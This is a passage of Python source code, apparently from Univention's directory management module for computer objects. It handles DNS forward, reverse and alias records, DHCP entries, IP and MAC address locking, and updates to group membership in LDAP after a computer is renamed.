:returns: 2-tuple (IPAddress, LdapAttributeName)\n\n >>> simpleComputer._ip2dns('127.0.0.1')\n (IPv4Address(u'127.0.0.1'), 'aRecord')\n >>> simpleComputer._ip2dns('::1')\n (IPv6Address(u'::1'), 'aAAARecord')\n \"\"\"\n ip = ip_address(u'%s' % (addr, ))\n return (ip, 'aAAARecord' if isinstance(ip, IPv6Address) else 'aRecord')\n\n def __modify_dns_forward_object(self, name, zoneDn, new_ip, old_ip): # type: (str, str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'we should modify a dns forward object: zoneDn=\"%s\", name=\"%s\", new_ip=\"%s\", old_ip=\"%s\"' % (zoneDn, name, new_ip, old_ip))\n zone = None\n if old_ip and new_ip:\n if not zoneDn:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n else:\n base = zoneDn\n\n naddr, nattr = self._ip2dns(new_ip)\n oaddr, oattr = self._ip2dns(old_ip)\n results = self.lo.search(base=base, scope='domain', attr=['aRecord', 'aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(%s=%s))', (name, oattr, old_ip)), unique=False)\n\n for dn, attr in results:\n old_aRecord = attr.get('aRecord', [])\n new_aRecord = copy.deepcopy(old_aRecord)\n old_aAAARecord = attr.get('aAAARecord', [])\n new_aAAARecord = copy.deepcopy(old_aAAARecord)\n\n if isinstance(oaddr, IPv6Address):\n new_aAAARecord.remove(old_ip.encode('ASCII'))\n else:\n new_aRecord.remove(old_ip.encode('ASCII'))\n\n new_ip = naddr.exploded.encode('ASCII')\n if isinstance(naddr, IPv6Address):\n if new_ip not in new_aAAARecord:\n new_aAAARecord.append(new_ip)\n else:\n if new_ip not in new_aRecord:\n new_aRecord.append(new_ip)\n\n modlist = []\n if old_aAAARecord != new_aAAARecord:\n modlist.append(('aAAARecord', old_aAAARecord, new_aAAARecord))\n if old_aRecord != new_aRecord:\n modlist.append(('aRecord', old_aRecord, new_aRecord))\n self.lo.modify(dn, modlist)\n if not zoneDn:\n zone = self.lo.parentDn(dn)\n\n if zoneDn:\n zone = zoneDn\n\n if zone:\n ud.debug(ud.ADMIN, ud.INFO, 'update the zon sOARecord for the zone: %s' % zone)\n\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zone)\n zone.open()\n zone.modify()\n\n def __add_dns_forward_object(self, name, zoneDn, ip): # type: (str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object: zoneDn=\"%s\", name=\"%s\", ip=\"%s\"' % (zoneDn, name, ip))\n if not all((name, ip, zoneDn)):\n return\n addr = ip_address(u'%s' % (ip,))\n if isinstance(addr, IPv6Address):\n self.__add_dns_forward_object_ipv6(name, zoneDn, addr)\n elif isinstance(addr, IPv4Address):\n self.__add_dns_forward_object_ipv4(name, zoneDn, addr)\n\n def __add_dns_forward_object_ipv6(self, name, zoneDn, addr): # type: (str, str, IPv6Address) -> None\n ip = addr.exploded.encode('ASCII')\n results = self.lo.search(base=zoneDn, scope='domain', attr=['aAAARecord'], filter=filter_format('(&(relativeDomainName=%s)(!(cNAMERecord=*)))', (name,)), unique=False)\n if not results:\n try:\n self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn), [\n ('objectClass', [b'top', b'dNSZone', b'univentionObject']),\n ('univentionObjectType', [b'dns/host_record']),\n ('zoneName', explode_rdn(zoneDn, True)[0].encode('UTF-8')),\n ('aAAARecord', [ip]),\n ('relativeDomainName', [name.encode('UTF-8')]),\n ])\n except univention.admin.uexceptions.objectExists as ex:\n raise univention.admin.uexceptions.dnsAliasRecordExists(ex.dn)\n # TODO: check if zoneDn really a forwardZone, maybe it is a container under a zone\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else:\n for dn, attr in results:\n if 'aAAARecord' in attr:\n new_ip_list = copy.deepcopy(attr['aAAARecord'])\n if ip not in new_ip_list:\n new_ip_list.append(ip)\n self.lo.modify(dn, [('aAAARecord', attr['aAAARecord'], new_ip_list)])\n else:\n self.lo.modify(dn, [('aAAARecord', b'', ip)])\n\n def __add_dns_forward_object_ipv4(self, name, zoneDn, addr): # type: (str, str, IPv4Address) -> None\n ip = addr.exploded.encode('ASCII')\n results = self.lo.search(base=zoneDn, scope='domain', attr=['aRecord'], filter=filter_format('(&(relativeDomainName=%s)(!(cNAMERecord=*)))', (name,)), unique=False)\n if not results:\n try:\n self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(name), zoneDn), [\n ('objectClass', [b'top', b'dNSZone', b'univentionObject']),\n ('univentionObjectType', [b'dns/host_record']),\n ('zoneName', explode_rdn(zoneDn, True)[0].encode('UTF-8')),\n ('ARecord', [ip]),\n ('relativeDomainName', [name.encode('UTF-8')]),\n ])\n except univention.admin.uexceptions.objectExists as ex:\n raise univention.admin.uexceptions.dnsAliasRecordExists(ex.dn)\n # TODO: check if zoneDn really a forwardZone, maybe it is a container under a zone\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else:\n for dn, attr in results:\n if 'aRecord' in attr:\n new_ip_list = copy.deepcopy(attr['aRecord'])\n if ip not in new_ip_list:\n new_ip_list.append(ip)\n self.lo.modify(dn, [('aRecord', attr['aRecord'], new_ip_list)])\n else:\n self.lo.modify(dn, [('aRecord', b'', ip)])\n\n def __add_dns_alias_object(self, name, dnsForwardZone, dnsAliasZoneContainer, alias): # type: (str, str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'add a dns alias object: name=\"%s\", dnsForwardZone=\"%s\", dnsAliasZoneContainer=\"%s\", alias=\"%s\"' % (name, dnsForwardZone, dnsAliasZoneContainer, alias))\n alias = alias.rstrip('.')\n if name and dnsForwardZone and dnsAliasZoneContainer and alias:\n results = self.lo.search(base=dnsAliasZoneContainer, scope='domain', attr=['cNAMERecord'], filter=filter_format('relativeDomainName=%s', (alias,)), unique=False)\n if not results:\n self.lo.add('relativeDomainName=%s,%s' % (escape_dn_chars(alias), dnsAliasZoneContainer), [\n ('objectClass', [b'top', b'dNSZone', b'univentionObject']),\n ('univentionObjectType', [b'dns/alias']),\n ('zoneName', explode_rdn(dnsAliasZoneContainer, True)[0].encode('UTF-8')),\n ('cNAMERecord', [b\"%s.%s.\" % (name.encode('UTF-8'), dnsForwardZone.encode('UTF-8'))]),\n ('relativeDomainName', [alias.encode('UTF-8')]),\n ])\n\n # TODO: check if dnsAliasZoneContainer really is a forwardZone, maybe it is a container under a zone\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, dnsAliasZoneContainer)\n zone.open()\n zone.modify()\n else:\n # throw exception, cNAMERecord is single value\n raise univention.admin.uexceptions.dnsAliasAlreadyUsed(_('DNS alias is already in use.'))\n\n def __remove_dns_alias_object(self, name, dnsForwardZone, dnsAliasZoneContainer, alias=None): # type: (str, str, str, str) -> None\n ud.debug(ud.ADMIN, ud.INFO, 'remove a dns alias object: name=\"%s\", dnsForwardZone=\"%s\", dnsAliasZoneContainer=\"%s\", alias=\"%s\"' % (name, dnsForwardZone, dnsAliasZoneContainer, alias))\n if name:\n if alias:\n if dnsAliasZoneContainer:\n self.lo.delete('relativeDomainName=%s,%s' % (escape_dn_chars(alias), dnsAliasZoneContainer))\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, dnsAliasZoneContainer)\n zone.open()\n zone.modify()\n elif dnsForwardZone:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n ud.debug(ud.ADMIN, ud.INFO, 'search base=\"%s\"' % base)\n results = self.lo.search(base=base, scope='domain', attr=['zoneName'], filter=filter_format('(&(objectClass=dNSZone)(relativeDomainName=%s)(cNAMERecord=%s.%s.))', (alias, name, dnsForwardZone)), unique=False, required=False)\n for dn, attr in results:\n # remove the object\n self.lo.delete(dn)\n # and update the SOA version number for the zone\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', (attr['zoneName'][0].decode('UTF-8'),)), unique=False)\n for zoneDn in results:\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else:\n if dnsForwardZone:\n tmppos = univention.admin.uldap.position(self.position.getDomain())\n base = tmppos.getBase()\n ud.debug(ud.ADMIN, ud.INFO, 'search base=\"%s\"' % base)\n results = self.lo.search(base=base, scope='domain', attr=['zoneName'], filter=filter_format('(&(objectClass=dNSZone)(&(cNAMERecord=%s)(cNAMERecord=%s.%s.))', (name, name, dnsForwardZone)), unique=False, required=False)\n for dn, attr in results:\n # remove the object\n self.lo.delete(dn)\n # and update the SOA version number for the zone\n results = self.lo.searchDn(base=tmppos.getBase(), scope='domain', filter=filter_format('(&(objectClass=dNSZone)(zoneName=%s)(relativeDomainName=@))', (attr['zoneName'][0].decode('UTF-8'),)), unique=False)\n for zoneDn in results:\n zone = univention.admin.handlers.dns.forward_zone.object(self.co, self.lo, self.position, zoneDn)\n zone.open()\n zone.modify()\n else: # not enough info to remove alias entries\n pass\n\n def _ldap_post_modify(self):\n super(simpleComputer, self)._ldap_post_modify()\n\n self.__multiip |= len(self['mac']) > 1 or len(self['ip']) > 1\n\n for entry in self.__changes['dhcpEntryZone']['remove']:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: removed: %s' % (entry,))\n dn, ip, mac = self.__split_dhcp_line(entry)\n if not ip and not mac and not self.__multiip:\n mac = ''\n if self['mac']:\n mac = self['mac'][0]\n self.__remove_from_dhcp_object(mac=mac)\n else:\n self.__remove_from_dhcp_object(ip=ip, mac=mac)\n\n for entry in self.__changes['dhcpEntryZone']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: added: %s' % (entry,))\n dn, ip, mac = self.__split_dhcp_line(entry)\n if not ip and not mac and not self.__multiip:\n ip, mac = ('', '')\n if self['ip']:\n ip = self['ip'][0]\n if self['mac']:\n mac = self['mac'][0]\n self.__modify_dhcp_object(dn, mac, ip=ip)\n\n for entry in self.__changes['dnsEntryZoneForward']['remove']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__remove_dns_forward_object(self['name'], dn, ip)\n self.__remove_related_ptrrecords(dn, ip)\n else:\n self.__remove_dns_forward_object(self['name'], dn, ip)\n self.__remove_related_ptrrecords(dn, ip)\n\n for entry in self.__changes['dnsEntryZoneForward']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object \"%s\"' % (entry,))\n dn, ip = self.__split_dns_line(entry)\n ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dn=\"%s\" and ip=\"%s\"' % (dn, ip))\n if not ip and not self.__multiip:\n ud.debug(ud.ADMIN, ud.INFO, 'no multiip environment')\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__add_dns_forward_object(self['name'], dn, ip)\n self.__add_related_ptrrecords(dn, ip)\n else:\n self.__add_dns_forward_object(self['name'], dn, ip)\n self.__add_related_ptrrecords(dn, ip)\n\n for entry in self.__changes['dnsEntryZoneReverse']['remove']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__remove_dns_reverse_object(self['name'], dn, ip)\n else:\n self.__remove_dns_reverse_object(self['name'], dn, ip)\n\n for entry in self.__changes['dnsEntryZoneReverse']['add']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__add_dns_reverse_object(self['name'], dn, ip)\n else:\n self.__add_dns_reverse_object(self['name'], dn, ip)\n\n for entry in self.__changes['dnsEntryZoneAlias']['remove']:\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n if not alias:\n # nonfunctional code since self[ 'alias' ] should be self[ 'dnsAlias' ], but this case does not seem to occur\n self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])\n else:\n self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)\n\n for entry in self.__changes['dnsEntryZoneAlias']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns alias object \"%s\"' % (entry,))\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dnsForwardZone [%s], dnsAliasZoneContainer [%s] and alias [%s]' % (dnsForwardZone, dnsAliasZoneContainer, alias))\n if not alias:\n self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])\n else:\n self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)\n\n for entry in self.__changes['mac']['remove']:\n self.__remove_from_dhcp_object(mac=entry)\n\n changed_ip = False\n for entry in self.__changes['ip']['remove']:\n # self.__remove_from_dhcp_object(ip=entry)\n if not self.__multiip:\n if len(self.__changes['ip']['add']) > 0:\n # we change\n single_ip = self.__changes['ip']['add'][0]\n self.__modify_dns_forward_object(self['name'], None, single_ip, entry)\n changed_ip = True\n for mac in self['mac']:\n dn = self.__remove_from_dhcp_object(ip=entry, mac=mac)\n try:\n dn = self.lo.parentDn(dn)\n self.__modify_dhcp_object(dn, mac, ip=single_ip)\n except Exception:\n pass\n else:\n # remove the dns objects\n self.__remove_dns_forward_object(self['name'], None, entry)\n else:\n self.__remove_dns_forward_object(self['name'], None, entry)\n self.__remove_from_dhcp_object(ip=entry)\n\n self.__remove_dns_reverse_object(self['name'], None, entry)\n\n for entry in self.__changes['ip']['add']:\n if not self.__multiip:\n if self.get('dnsEntryZoneForward', []) and not changed_ip:\n self.__add_dns_forward_object(self['name'], self['dnsEntryZoneForward'][0][0], entry)\n for dnsEntryZoneReverse in self.get('dnsEntryZoneReverse', []):\n x, ip = self.__split_dns_line(dnsEntryZoneReverse)\n zoneIsV6 = explode_rdn(x, True)[0].endswith('.ip6.arpa')\n entryIsV6 = ':' in entry\n if zoneIsV6 == entryIsV6:\n self.__add_dns_reverse_object(self['name'], x, entry)\n\n if self.__changes['name']:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: name has changed')\n self.__update_groups_after_namechange()\n self.__rename_dhcp_object(old_name=self.__changes['name'][0], new_name=self.__changes['name'][1])\n self.__rename_dns_object(position=None, old_name=self.__changes['name'][0], new_name=self.__changes['name'][1])\n\n self.update_groups()\n\n def __remove_associated_domain(self, entry):\n dn, ip = self.__split_dns_line(entry)\n domain = explode_rdn(dn, 1)[0]\n if self.info.get('domain', None) == domain:\n self.info['domain'] = None\n\n def __set_associated_domain(self, entry):\n dn, ip = self.__split_dns_line(entry)\n domain = explode_rdn(dn, 1)[0]\n if not self.info.get('domain', None):\n self.info['domain'] = domain\n\n def _ldap_modlist(self):\n self.__changes = {\n 'mac': {'remove': [], 'add': []},\n 'ip': {'remove': [], 'add': []},\n 'name': None,\n 'dnsEntryZoneForward': {'remove': [], 'add': []},\n 'dnsEntryZoneReverse': {'remove': [], 'add': []},\n 'dnsEntryZoneAlias': {'remove': [], 'add': []},\n 'dhcpEntryZone': {'remove': [], 'add': []},\n }\n ml = []\n if self.hasChanged('mac'):\n for macAddress in self.info.get('mac', []):\n if macAddress in self.oldinfo.get('mac', []):\n continue\n try:\n self.__changes['mac']['add'].append(self.request_lock('mac', macAddress))\n except univention.admin.uexceptions.noLock:\n raise univention.admin.uexceptions.macAlreadyUsed(macAddress)\n for macAddress in self.oldinfo.get('mac', []):\n if macAddress in self.info.get('mac', []):\n continue\n self.__changes['mac']['remove'].append(macAddress)\n\n oldAddresses = self.oldinfo.get('ip') or ()\n newAddresses = self.info.get('ip') or ()\n if oldAddresses != newAddresses:\n old_addr = [ip_address(u'%s' % addr) for addr in oldAddresses]\n old_ipv4 = [addr.exploded.encode('ASCII') for addr in old_addr if isinstance(addr, IPv4Address)]\n old_ipv6 = [addr.exploded.encode('ASCII') for addr in old_addr if isinstance(addr, IPv6Address)]\n new_addr = [ip_address(u'%s' % addr) for addr in newAddresses]\n new_ipv4 = [addr.exploded.encode('ASCII') for addr in new_addr if isinstance(addr, IPv4Address)]\n new_ipv6 = [addr.exploded.encode('ASCII') for addr in new_addr if isinstance(addr, IPv6Address)]\n ml.append(('aRecord', old_ipv4, new_ipv4))\n ml.append(('aAAARecord', old_ipv6, new_ipv6))\n\n if self.hasChanged('ip'):\n for ipAddress in self['ip']:\n if not ipAddress:\n continue\n if ipAddress in self.oldinfo.get('ip'):\n continue\n if not self.ip_alredy_requested:\n try:\n ipAddress = self.request_lock('aRecord', ipAddress)\n except univention.admin.uexceptions.noLock:\n self.ip_alredy_requested = 0\n raise univention.admin.uexceptions.ipAlreadyUsed(ipAddress)\n\n self.__changes['ip']['add'].append(ipAddress)\n\n for ipAddress in self.oldinfo.get('ip', []):\n if ipAddress in self.info['ip']:\n continue\n self.__changes['ip']['remove'].append(ipAddress)\n\n if self.hasChanged('name'):\n ml.append(('sn', self.oldattr.get('sn', [None])[0], self['name'].encode('UTF-8')))\n self.__changes['name'] = (self.oldattr.get('sn', [b''])[0].decode(\"UTF-8\") or None, self['name'])\n\n if self.hasChanged('ip') or self.hasChanged('mac'):\n dhcp = [self.__split_dhcp_line(entry) for entry in self.info.get('dhcpEntryZone', [])]\n if len(newAddresses) <= 1 and len(self.info.get('mac', [])) == 1 and dhcp:\n # In this special case, we assume the mapping between ip/mac address to be\n # unique. The dhcp entry needs to contain the mac address (as specified by\n # the ldap search for dhcp entries), the ip address may not correspond to\n # the ip address associated with the computer ldap object, but this would\n # be erroneous anyway. We therefore update the dhcp entry to correspond to\n # the current ip and mac address. (Bug #20315)\n self.info['dhcpEntryZone'] = [\n (dn, newAddresses[0] if newAddresses else '', self.info['mac'][0])\n for (dn, ip, _mac) in dhcp\n ]\n else:\n # in all other cases, we remove old dhcp entries that do not match ip or\n # mac addresses (Bug #18966)\n removedIPs = set(self.oldinfo.get('ip', [])) - set(self['ip'])\n removedMACs = set(self.oldinfo.get('mac', [])) - set(self['mac'])\n self.info['dhcpEntryZone'] = [\n (dn, ip, _mac)\n for (dn, ip, _mac) in dhcp\n if not (ip in removedIPs or _mac in removedMACs)\n ]\n\n if self.hasChanged('dhcpEntryZone'):\n if 'dhcpEntryZone' in self.oldinfo:\n if 'dhcpEntryZone' in self.info:\n for entry in self.oldinfo['dhcpEntryZone']:\n if entry not in self.info['dhcpEntryZone']:\n self.__changes['dhcpEntryZone']['remove'].append(entry)\n else:\n for entry in self.oldinfo['dhcpEntryZone']:\n self.__changes['dhcpEntryZone']['remove'].append(entry)\n if 'dhcpEntryZone' in self.info:\n for entry in self.info['dhcpEntryZone']:\n # check if line is valid\n dn, ip, mac = self.__split_dhcp_line(entry)\n if dn and mac:\n if entry not in self.oldinfo.get('dhcpEntryZone', []):\n self.__changes['dhcpEntryZone']['add'].append(entry)\n else:\n raise univention.admin.uexceptions.invalidDhcpEntry(_('The DHCP entry for this host should contain the zone LDAP-DN, the IP address and the MAC address.'))\n\n if self.hasChanged('dnsEntryZoneForward'):\n for entry in self.oldinfo.get('dnsEntryZoneForward', []):\n if entry not in self.info.get('dnsEntryZoneForward', []):\n self.__changes['dnsEntryZoneForward']['remove'].append(entry)\n self.__remove_associated_domain(entry)\n for entry in self.info.get('dnsEntryZoneForward', []):\n if entry == '':\n continue\n if entry not in self.oldinfo.get('dnsEntryZoneForward', []):\n self.__changes['dnsEntryZoneForward']['add'].append(entry)\n self.__set_associated_domain(entry)\n\n if self.hasChanged('dnsEntryZoneReverse'):\n for entry in self.oldinfo.get('dnsEntryZoneReverse', []):\n if entry not in self.info.get('dnsEntryZoneReverse', []):\n self.__changes['dnsEntryZoneReverse']['remove'].append(entry)\n for entry in self.info.get('dnsEntryZoneReverse', []):\n if entry not in self.oldinfo.get('dnsEntryZoneReverse', []):\n self.__changes['dnsEntryZoneReverse']['add'].append(entry)\n\n if self.hasChanged('dnsEntryZoneAlias'):\n for entry in self.oldinfo.get('dnsEntryZoneAlias', []):\n if entry not in self.info.get('dnsEntryZoneAlias', []):\n self.__changes['dnsEntryZoneAlias']['remove'].append(entry)\n for entry in self.info.get('dnsEntryZoneAlias', []):\n # check if line is valid\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n if dnsForwardZone and dnsAliasZoneContainer and alias:\n if entry not in self.oldinfo.get('dnsEntryZoneAlias', []):\n self.__changes['dnsEntryZoneAlias']['add'].append(entry)\n else:\n raise univention.admin.uexceptions.invalidDNSAliasEntry(_('The DNS alias entry for this host should contain the zone name, the alias zone container LDAP-DN and the alias.'))\n\n self.__multiip = len(self['mac']) > 1 or len(self['ip']) > 1\n\n ml += super(simpleComputer, self)._ldap_modlist()\n\n return ml\n\n @classmethod\n def calc_dns_reverse_entry_name(cls, sip, reverseDN): # type: (Text, Text) -> Text\n \"\"\"\n >>> simpleComputer.calc_dns_reverse_entry_name('10.200.2.5', 'subnet=2.200.10.in-addr.arpa')\n u'5'\n >>> simpleComputer.calc_dns_reverse_entry_name('10.200.2.5', 'subnet=200.10.in-addr.arpa')\n u'5.2'\n >>> simpleComputer.calc_dns_reverse_entry_name('2001:db8::3', 'subnet=0.0.0.0.0.0.0.0.8.b.d.0.1.0.0.2.ip6.arpa')\n u'3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0'\n >>> simpleComputer.calc_dns_reverse_entry_name('1.2.3.4', 'subnet=2.in-addr.arpa')\n Traceback (most recent call last):\n ...\n ValueError: 4.3.2.1.in-addr.arpa not in .2.in-addr.arpa\n \"\"\"\n addr = ip_address(u'%s' % (sip,))\n rev = addr.reverse_pointer\n subnet = u\".%s\" % (explode_rdn(reverseDN, True)[0],)\n if not rev.endswith(subnet):\n raise ValueError(\"%s not in %s\" % (rev, subnet))\n return rev[:-len(subnet)]\n\n def _ldap_pre_create(self):\n super(simpleComputer, self)._ldap_pre_create()\n self.check_common_name_length()\n\n def _ldap_pre_modify(self):\n super(simpleComputer, self)._ldap_pre_modify()\n self.check_common_name_length()\n\n def _ldap_post_create(self):\n super(simpleComputer, self)._ldap_post_create()\n for entry in self.__changes['dhcpEntryZone']['remove']:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: removed: %s' % (entry,))\n dn, ip, mac = self.__split_dhcp_line(entry)\n if not ip and not mac and not self.__multiip:\n mac = ''\n if self['mac']:\n mac = self['mac'][0]\n self.__remove_from_dhcp_object(mac=mac)\n else:\n self.__remove_from_dhcp_object(ip=ip, mac=mac)\n\n for entry in self.__changes['dhcpEntryZone']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'simpleComputer: dhcp check: added: %s' % (entry,))\n dn, ip, mac = self.__split_dhcp_line(entry)\n if not ip and not mac and not self.__multiip:\n if len(self['ip']) > 0 and len(self['mac']) > 0:\n self.__modify_dhcp_object(dn, self['mac'][0], ip=self['ip'][0])\n else:\n self.__modify_dhcp_object(dn, mac, ip=ip)\n\n for entry in self.__changes['dnsEntryZoneForward']['remove']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__remove_dns_forward_object(self['name'], dn, ip)\n else:\n self.__remove_dns_forward_object(self['name'], dn, ip)\n\n for entry in self.__changes['dnsEntryZoneForward']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns forward object \"%s\"' % (entry,))\n dn, ip = self.__split_dns_line(entry)\n ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dn=\"%s\" and ip=\"%s\"' % (dn, ip))\n if not ip and not self.__multiip:\n ud.debug(ud.ADMIN, ud.INFO, 'no multiip environment')\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__add_dns_forward_object(self['name'], dn, ip)\n else:\n self.__add_dns_forward_object(self['name'], dn, ip)\n\n for entry in self.__changes['dnsEntryZoneReverse']['remove']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__remove_dns_reverse_object(self['name'], dn, ip)\n else:\n self.__remove_dns_reverse_object(self['name'], dn, ip)\n\n for entry in self.__changes['dnsEntryZoneReverse']['add']:\n dn, ip = self.__split_dns_line(entry)\n if not ip and not self.__multiip:\n ip = ''\n if self['ip']:\n ip = self['ip'][0]\n self.__add_dns_reverse_object(self['name'], dn, ip)\n else:\n self.__add_dns_reverse_object(self['name'], dn, ip)\n\n if not self.__multiip and len(self.get('dhcpEntryZone', [])) > 0:\n dn, ip, mac = self['dhcpEntryZone'][0]\n for entry in self.__changes['mac']['add']:\n if len(self['ip']) > 0:\n self.__modify_dhcp_object(dn, entry, ip=self['ip'][0])\n else:\n self.__modify_dhcp_object(dn, entry)\n for entry in self.__changes['ip']['add']:\n if len(self['mac']) > 0:\n self.__modify_dhcp_object(dn, self['mac'][0], ip=entry)\n\n for entry in self.__changes['dnsEntryZoneAlias']['remove']:\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n if not alias:\n # nonfunctional code since self[ 'alias' ] should be self[ 'dnsAlias' ], but this case does not seem to occur\n self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])\n else:\n self.__remove_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)\n for entry in self.__changes['dnsEntryZoneAlias']['add']:\n ud.debug(ud.ADMIN, ud.INFO, 'we should add a dns alias object \"%s\"' % (entry,))\n dnsForwardZone, dnsAliasZoneContainer, alias = entry\n ud.debug(ud.ADMIN, ud.INFO, 'changed the object to dnsForwardZone [%s], dnsAliasZoneContainer [%s] and alias [%s]' % (dnsForwardZone, dnsAliasZoneContainer, alias))\n if not alias:\n self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, self['alias'][0])\n else:\n self.__add_dns_alias_object(self['name'], dnsForwardZone, dnsAliasZoneContainer, alias)\n\n self.update_groups()\n\n def _ldap_post_remove(self):\n if self['mac']:\n for macAddress in self['mac']:\n if macAddress:\n self.alloc.append(('mac', macAddress))\n if self['ip']:\n for ipAddress in self['ip']:\n if ipAddress:\n self.alloc.append(('aRecord', ipAddress))\n super(simpleComputer, self)._ldap_post_remove()\n\n # remove computer from groups\n groups = copy.deepcopy(self['groups'])\n if self.oldinfo.get('primaryGroup'):\n groups.append(self.oldinfo.get('primaryGroup'))\n for group in groups:\n groupObject = univention.admin.objects.get(univention.admin.modules.get('groups/group'), self.co, self.lo, self.position, group)\n groupObject.fast_member_remove([self.dn], [x.decode('UTF-8') for x in self.oldattr.get('uid', [])], ignore_license=True)\n\n def __update_groups_after_namechange(self):\n oldname = self.oldinfo.get('name')\n newname = self.info.get('name')\n if not oldname:\n ud.debug(ud.ADMIN, ud.ERROR, '__update_groups_after_namechange: oldname is empty')\n return\n\n olddn = self.old_dn.encode('UTF-8')\n newdn = self.dn.encode('UTF-8')\n\n oldUid = b'%s$' % oldname.encode('UTF-8')\n newUid = b'%s$' % newname.encode('UTF-8')\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: olddn=%s' % olddn)\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: newdn=%s' % newdn)\n\n new_groups = set(self.info.get('groups', []))\n old_groups = set(self.oldinfo.get('groups', []))\n for group in new_groups | old_groups:\n\n # Using the UDM groups/group object does not work at this point. The computer object has already been renamed.\n # During open() of groups/group each member is checked if it exists. Because the computer object with \"olddn\" is missing,\n # it won't show up in groupobj['hosts']. That's why the uniqueMember/memberUid updates is done directly via\n # self.lo.modify()\n\n oldMemberUids = self.lo.getAttr(group, 'memberUid')\n newMemberUids = copy.deepcopy(oldMemberUids)\n if group in new_groups:\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: changing memberUid in grp=%s' % (group,))\n if oldUid in newMemberUids:\n newMemberUids.remove(oldUid)\n if newUid not in newMemberUids:\n newMemberUids.append(newUid)\n self.lo.modify(group, [('memberUid', oldMemberUids, newMemberUids)])\n else:\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing memberUid from grp=%s' % (group,))\n if oldUid in oldMemberUids:\n oldMemberUids = oldUid\n newMemberUids = b''\n self.lo.modify(group, [('memberUid', oldMemberUids, newMemberUids)])\n\n # we are doing the uniqueMember seperately because of a potential refint overlay that already changed the dn for us\n oldUniqueMembers = self.lo.getAttr(group, 'uniqueMember')\n newUniqueMembers = copy.deepcopy(oldUniqueMembers)\n if group in new_groups:\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: changing uniqueMember in grp=%s' % (group,))\n if olddn in newUniqueMembers:\n newUniqueMembers.remove(olddn)\n if newdn not in newUniqueMembers:\n newUniqueMembers.append(newdn)\n self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])\n else:\n if olddn in oldUniqueMembers:\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing uniqueMember from grp=%s' % (group,))\n oldUniqueMembers = olddn\n newUniqueMembers = b''\n self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])\n if newdn in oldUniqueMembers:\n ud.debug(ud.ADMIN, ud.INFO, '__update_groups_after_namechange: removing uniqueMember from grp=%s' % (group,))\n oldUniqueMembers = newdn\n newUniqueMembers = b''\n self.lo.modify(group, [('uniqueMember', oldUniqueMembers, newUniqueMembers)])\n\n def update_groups(self): # type: () -> None\n if not self.hasChanged('groups') and not self.oldPrimaryGroupDn and not self.newPrimaryGroupDn:\n return\n 